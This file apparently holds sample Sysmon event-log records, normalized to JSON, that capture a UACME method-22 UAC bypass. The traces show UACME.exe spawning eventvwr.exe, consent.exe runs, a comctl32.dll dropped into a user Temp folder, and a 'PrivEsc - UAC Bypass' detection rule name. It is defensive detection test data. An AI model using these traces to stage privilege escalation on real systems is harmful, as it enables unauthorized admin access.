"object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 318 0000028064471300", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-7930-5d45-0000-001055de0601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "4740", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.399Z", "type": "raw", "uuid": "2a8d15ba-ff8a-4709-b122-f4121ea80dd1"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:16.7215806Z\"},\"EventRecordID\":\"5443\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:16.350\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-7930-5d45-0000-001027dc0601}\"},{\"Name\":\"ProcessId\",\"text\":\"4604\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\eventvwr.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Event Viewer Snapin Launcher\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\eventvwr.exe\\\" 
\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020fbd31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3fb\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"Medium\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=1AF3BB8D63A0ED48DF1F1706B791404DEE28524F,MD5=43129C3BFC9746CE9FFE8E45D10FE050,SHA256=BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70,IMPHASH=5843AE9886BB500E05E07EE59BB5AD42\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5336\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Desktop\\\\UACME.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"UACME.exe 22\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020fbd31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "Medium", "object.account.session_id": "1627131", "object.process.cmdline": "\"C:\\Windows\\system32\\eventvwr.exe\"", "object.process.cwd": "C:\\Users\\IEUser\\Desktop\\", "object.process.fullpath": "c:\\windows\\system32\\eventvwr.exe", 
"object.process.guid": "747f3d96-7930-5d45-0000-001027dc0601", "object.process.hash.imphash": "5843AE9886BB500E05E07EE59BB5AD42", "object.process.hash.md5": "43129C3BFC9746CE9FFE8E45D10FE050", "object.process.hash.sha1": "1AF3BB8D63A0ED48DF1F1706B791404DEE28524F", "object.process.hash.sha256": "BC87E4F462F00B826EC09AC16B625D0F70439C48FC04A52A41B4CD9E78401F70", "object.process.id": "4604", "object.process.meta": "Description:Event Viewer Snapin Launcher | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "eventvwr.exe", "object.process.parent.cmdline": "UACME.exe 22", "object.process.parent.fullpath": "c:\\users\\ieuser\\desktop\\uacme.exe", "object.process.parent.guid": "747f3d96-792d-5d45-0000-00104f190601", "object.process.parent.id": "5336", "object.process.parent.name": "uacme.exe", "object.process.parent.path": "c:\\users\\ieuser\\desktop\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "Medium", "subject.account.session_id": "1627131", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:16.350Z", "type": "raw", "uuid": "46a33b2f-ec5a-47cd-b6c0-98543e66a016"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:15.6646074Z\"},\"EventRecordID\":\"5442\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:15.660\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792f-5d45-0000-00103da80601}\"},{\"Name\":\"ProcessId\",\"text\":\"2388\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC170\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC170", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792f-5d45-0000-00103da80601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "2388", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:15.660Z", "type": "raw", "uuid": "4e1d5f0f-b3c3-429c-9ef4-1346dd1497c0"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:14.9773218Z\"},\"EventRecordID\":\"5441\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:14.972\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792e-5d45-0000-00104a760601}\"},{\"Name\":\"ProcessId\",\"text\":\"8072\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC890\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC890", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792e-5d45-0000-00104a760601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "8072", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:14.972Z", "type": "raw", "uuid": "e547ebd6-7c5c-43f5-976a-3338e6f9d1e8"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:14.3727351Z\"},\"EventRecordID\":\"5440\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:14.368\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792e-5d45-0000-001001560601}\"},{\"Name\":\"ProcessId\",\"text\":\"6716\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC9C0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC9C0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792e-5d45-0000-001001560601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "6716", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:14.368Z", "type": "raw", "uuid": "15801084-49e4-410f-8731-2d4fc0090ea9"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.8748883Z\"},\"EventRecordID\":\"5439\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.760\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00107a250601}\"},{\"Name\":\"ProcessId\",\"text\":\"7472\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Consent UI for administrative applications\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"consent.exe 896 272 00000280644BC3D0\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"NT 
AUTHORITY\\\\SYSTEM\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-d4e9-5d45-0000-0020e7030000}\"},{\"Name\":\"LogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"System\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=9329B2362078DE27242DD4534F588AF3264BF0BF,MD5=27992D7EBE51AEC655A088DE88BAD5C9,SHA256=8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6,IMPHASH=522D83761201075834F05037F5307949\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-5769-5d45-0000-001044e83300}\"},{\"Name\":\"ParentProcessId\",\"text\":\"896\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Appinfo\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-d4e9-5d45-0000-0020e7030000", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "consent.exe 896 272 00000280644BC3D0", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe", "object.process.guid": "747f3d96-792d-5d45-0000-00107a250601", "object.process.hash.imphash": 
"522D83761201075834F05037F5307949", "object.process.hash.md5": "27992D7EBE51AEC655A088DE88BAD5C9", "object.process.hash.sha1": "9329B2362078DE27242DD4534F588AF3264BF0BF", "object.process.hash.sha256": "8F112431143A22BAAAFB448EEFD63BF90E7691C890AC69A296574FD07BA03EC6", "object.process.id": "7472", "object.process.meta": "Description:Consent UI for administrative applications | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "consent.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Appinfo", "object.process.parent.fullpath": "c:\\windows\\system32\\svchost.exe", "object.process.parent.guid": "747f3d96-5769-5d45-0000-001044e83300", "object.process.parent.id": "896", "object.process.parent.name": "svchost.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T21:01:53.267Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:08:13.760Z", "type": "raw", "uuid": "4358e286-1ee5-4521-af33-0ede7dac5ef4"}
+{"action": "create", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"11\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"11\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:08:13.8183818Z\"},\"EventRecordID\":\"5438\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"PrivEsc - UAC Bypass UACME 22\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:08:13.721\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-792d-5d45-0000-00104f190601}\"},{\"Name\":\"ProcessId\",\"text\":\"5336\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\explorer.exe\"},{\"Name\":\"TargetFilename\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\comctl32.dll\"},{\"Name\":\"CreationUtcTime\",\"text\":\"2019-08-03 12:08:13.721\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "PrivEsc - UAC Bypass UACME 22", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_11_File_create", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "11", "normalized": true, "object": "file_object", 